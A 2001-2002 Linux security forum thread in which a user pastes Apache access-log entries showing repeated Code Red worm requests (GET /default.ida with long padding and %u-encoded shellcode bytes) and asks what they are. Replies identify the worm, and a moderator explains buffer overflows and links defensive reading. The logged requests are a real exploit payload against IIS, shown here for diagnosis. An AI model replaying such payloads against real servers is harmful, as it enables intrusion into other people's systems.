LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 08-06-2001, 11:11 AM   #1
LionKing
Member
 
Registered: Jun 2001
Location: Allen, Texas, USA
Distribution: Redhat
Posts: 82

Rep: Reputation: 15
attacking by http via port 80


Hi, I noticed my httpd access_log contains lot of access (see bellow) which appears to be attempts of breaking in. Could someone shed some lights what type of attack are these? what security holes it was targeting and the best way to deny such attack. thank you.


[...snip]

cx733813-a.sking1.ri.home.com - - [06/Aug/2001:12:07:36 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%
u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000 3%
u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cx592009-c.btnrug1.la.home.com - - [06/Aug/2001:12:10:22 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u00 03
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cc29277-a.srst1.fl.home.com - - [06/Aug/2001:12:12:42 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX% u9
090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003% u8
b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cx592009-c.btnrug1.la.home.com - - [06/Aug/2001:12:14:41 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u00 03
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
h24-78-84-46.vc.shawcable.net - - [06/Aug/2001:12:15:40 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%
u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000 3%
u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cx1228736-a.elcjn1.sdca.home.com - - [06/Aug/2001:12:16:36 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u 00
03%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cc224520-b.burl1.nj.home.com - - [06/Aug/2001:12:26:16 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX %u
9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003 %u
8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cr476321-a.flfrd1.on.wave.home.com - - [06/Aug/2001:12:30:18 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3 %u
0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
cc1066214-a.chmbl1.ga.home.com - - [06/Aug/2001:12:37:02 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u00 03
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
24-159-100-30.hsacorp.net - - [06/Aug/2001:12:38:12 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9 09
0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8 b0
0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
node18246.a2000.nl - - [06/Aug/2001:12:41:39 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68 58
%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 1b
%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 307
[....snip]
 
Old 08-06-2001, 12:04 PM   #2
drjimstuckinwin
Member
 
Registered: Mar 2001
Location: Manchester UK
Distribution: Mainly Fedora
Posts: 496

Rep: Reputation: 30
Hi
I think this is mk2 code red. I think I saw this log text at www.grc.com there's a whole page on code red.
How to be safe...
Don't use MS products.
Jim
 
Old 08-06-2001, 03:11 PM   #3
mcleodnine
Senior Member
 
Registered: May 2001
Location: Left Coast - Canada
Distribution: s l a c k w a r e
Posts: 2,731

Rep: Reputation: 45
Uh Huh. See http://www.linuxquestions.org/questi...?threadid=5039
 
Old 08-06-2001, 04:18 PM   #4
mcleodnine
Senior Member
 
Registered: May 2001
Location: Left Coast - Canada
Distribution: s l a c k w a r e
Posts: 2,731

Rep: Reputation: 45
S'more logs and links to stories at www.rivergems.com/codered.html
 
Old 08-07-2001, 07:14 PM   #5
drjimstuckinwin
Member
 
Registered: Mar 2001
Location: Manchester UK
Distribution: Mainly Fedora
Posts: 496

Rep: Reputation: 30
On thinking about it, it was your post I saw the log data in.
OK so my memory nearly works right!
 
Old 12-11-2002, 06:11 PM   #6
Matique
LQ Newbie
 
Registered: Dec 2002
Location: UK
Distribution: SUSE
Posts: 3

Rep: Reputation: 0
How would someone exploit the http port? Im new to this game and need to secure my linux box.
 
Old 12-12-2002, 10:55 AM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595Reputation: 3595
Well, the do not "exploit the http port", but the application that is running bound to that port (it's just a way of defining stuff more clearly). If you've read the other threads mentioned you know by now you system is not vulnerable to this IIS crap, but in general you could say applications are vulnerable when they do not validate input properly, for instance for expected value length. Under such circumstances it would be possible to supply arguments that will force execution of something else (unexpected, but then again Nobody Expects The Spanish Inquisition :-] ).
This is what they call a buffer overflow or BO for short.
Here's some docs you may want to read.
If not, then at least read A Comparative Analysis of Methods of Defense against Buffer Overflow Attacks and A Buffer Overflow Study because they provide explanation and guidance on how to minimalize risks.

Also search this forum for the basic security docs, we're posting it aprox. once each month. Apache docs can be found easily Googling the web.
 
Old 12-12-2002, 01:08 PM   #8
Matique
LQ Newbie
 
Registered: Dec 2002
Location: UK
Distribution: SUSE
Posts: 3

Rep: Reputation: 0
Cheers
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Delay in HTTP Port Release sudhasmyle Linux - Networking 3 06-15-2005 02:14 PM
turn off http port 80, keep https port 443 lothario Linux - Networking 6 02-11-2005 05:06 AM
iptables - http port forwarding kevsco77 Linux - Newbie 2 01-24-2005 12:34 AM
HTTP port and Proxy port problem AZIMBD03 Linux - Networking 3 04-15-2004 10:20 PM
HTTP on port 8080 cauchy Linux - Networking 3 08-09-2001 08:29 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 06:31 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration